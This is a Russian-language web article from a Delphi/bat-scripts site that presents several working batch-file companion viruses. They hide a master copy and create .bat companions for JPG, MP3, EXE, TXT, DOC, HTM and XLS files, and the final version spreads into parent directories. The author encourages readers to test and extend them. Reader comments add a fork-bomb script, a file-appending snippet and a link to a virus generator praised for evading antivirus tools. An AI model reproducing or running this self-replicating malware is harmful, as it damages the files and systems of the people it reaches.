Четверг, 28.03.2024, 17:57 Приветствую вас Гость | Группа "Гости" 
Меню сайта

Категории раздела
Delphi [98]
Программирование
HTML [2]
Теги и примеры
Bat Скрипты [22]
Различные скрипты
Разное [7]
Всё что не вошло в основные разделы

Популярные статьи

Недавние темы

Опрос
Вы к нам ещё зайдёте?
Всего ответов: 428

Главная » Статьи » Bat Скрипты

скрипт JPEG
------------------------ резать тут -----------------------------
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"c:MrWeb.bat
attrib +h c:MrWeb.bat
:MrWebru
for %%g in (*.jpg) do call c:MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
------------------------ резать тут -----------------------------



Как видите, этот вирус является BAT-файлом. Принцип работы такой же как и у BAT-вирусов.

Если вы не поняли как все это работает, то объясняю. Каждая вирусная строка имеет метку "MrWeb", в каких-то строках эта метка не является пассивной, т.е. учавствует в работе вируса, например во-второй строке вируса "if '%1=='In_ goto MrWebin" эта метка содержится в метке "MrWebin", а вот в первой строке эта метка является пассивной и поэтому она заключена в знаки процента. Дак вот, при старте вируса происходит копирование вирусных строк (с меткой) в специальный файл "c:MrWeb.bat", конечно это происходит если данный файл не был раньше создан вирусом. Дальше вирус ищет *.JPG, если находит то заражает их, для этого вирус вызывает файл c:MrWeb.bat и передает ему имя файла, который следует заразить. Принцип заражения: например найден файл 001.JPG, вирус создает вирусный файл 001.JPG.bat, т.е. принцип компаньон-вируса. Юзер захочет посмотреть картинку, щелкнет по нему мышкой и увидит то, что хотел увидеть, т.е. картинку, а тем временем заразятся все другие картинки.

Круто? :) И это еще не все, кто-то может еще сомневается, что можно заразить любой файл... Так, какие типы файлов будем заражать? Файлы *.mp3 ? Музыку значит. Нет проблем.

Смотрите:

------------------------ резать тут -----------------------------
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"c:MrWeb.bat
attrib +h c:MrWeb.bat
:MrWebru
for %%g in (*.mp3) do call c:MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
------------------------ резать тут -----------------------------

Только знайте, если вы запускали первый пример вируса, а теперь хотите с этим поприкалываться, то удалите сначала специальный файл "c:MrWeb.bat", а то будете потом говорить, что mp3 ни3я заразить...

Чтобы еще-то заразить... Давайте что-нибудь из классики, например *.EXE. Так...

------------------------ резать тут -----------------------------
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"c:MrWeb.bat
attrib +h c:MrWeb.bat
:MrWebru
for %%g in (*.exe) do call c:MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:MrWeb.bat>>%2.bat
echo %2>>%2.bat%[MrWeb]%
:MrWeben
------------------------ резать тут -----------------------------

Учтите, что этот пример от предыдущего отличается не только банальным "*.exe", но и убиранием вызова виндовской программы start. :)

Что? *.txt заразить? Можно, хотя и не совсем нужно. Но я же говорил, что заражать можно все, значит получайте:

------------------------ резать тут -----------------------------
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"c:MrWeb.bat
attrib +h c:MrWeb.bat
:MrWebru
for %%g in (*.txt) do call c:MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
------------------------ резать тут -----------------------------


Но это были всё пистики, а теперь тыковки. Внимание. Представляю вам мега-вирус, он заражает *.jpg *.mp3 *.doc *.htm? *.xls. Причем заражает не только в текущем каталоге, но и надкаталоге, поэтому не удивляйтесь, если при его испытании, он расползется по всему винту.

Вот он:

------------------------ резать тут -----------------------------
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"c:MrWeb.bat
attrib +h c:MrWeb.bat
:MrWebru
for %%g in (..*.jpg ..*.doc ..*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
------------------------ резать тут -----------------------------

Напоминаю, если вы испытывали предыдущие примеры, то перед испытанием этого удалите файл c:MrWeb.bat.

Если у вас проскакивает мысля о том, чтобы заражать "*.*", т.е. все типы файлов, то скажу, что это возможно, только нужно сделать, чтобы вирус пропускал *.bat, если это не сделать, то получится не вирус, а прикольный троян, можете проверить ;).
Категория: Bat Скрипты | Добавил: dolphin (30.10.2009)
Просмотров: 9333 | Комментарии: 12 | Рейтинг: 4.1/9

Всего комментариев: 121 2 3 »
avatar
12
Подобные вирусы создает генератор bat вирусов BAT virii Generator MIX 1.0
Тут: http://vx.netlux.org/vx.php?id=tb14

Там есть режим перемутации - антивирусы обламываются почти всегда
avatar
11
А как на мабилу вири песать????????? wacko wacko wacko wacko
avatar
10
ХАКЕРЫ ВСЕГО МИРРА!!!!!! ВЗГЛЯНЬТЕ НА ЭТОТ БАТ ВИРУССС:
@echo off
for %%g in (*.exe) do copy %0>>%2 %%g
Этот БАТ скрипт добавляет свой код во все exe файлы себя. хочу отметить что при том когда скрипт был добавлен в ексешник он работает как обычно. при этом вес его до заражения был меньше значит он заразился. но есть минус sad !!! скрипты добавленные невоспроизводят свои функции в ексешнике. я попробую переписать машинный код в бат а он в новый ексе и посматрю что выйдет cool надеюсь я помог немного сайту с новыми вирями на бате smile smile smile
avatar
9
Мои вири все в формате *.BAT
avatar
8
Люди хотите чтобы ваш комп здох от перенагрузки ЦП так вот пишем это:
@echo off
start Љ®ЇЁп
start Љ®ЇЁп
start Љ®ЇЁп
start Љ®ЇЁп
start Љ®ЇЁп
start Љ®ЇЁп
start Љ®ЇЁп
start Љ®ЇЁп
start Љ®ЇЁп
Вирь после запуска неотключить тока если перезапустить комп!!!
Я проверил его на себе biggrin !! У мя до системной ошибки и дальше пошёл! biggrin !
Комп Завис по полной!! Нагрузка ЦП на пределе!!! biggrin Короче реальный вирус!!!! biggrin
1-5 6-10 11-12
avatar
Профиль


Логин:
Пароль:

Поиск

Наша кнопка
Вирусология, взгляд из Delphi

Статистика
Top.Mail.Ru Яндекс.Метрика Счетчик тИЦ и PR
Статистика материалов
Файлов: 455
Форум: 1165/8116
Коментариев: 768
Новостей: 29

Статистика пользователей
Всего: 526
За неделю: 3
Вчера: 0
Сегодня: 0
Всего онлайн: 1
Гостей: 1
Пользователей: 0

delphicode.ru © 2008 - 2024 Хостинг от uCoz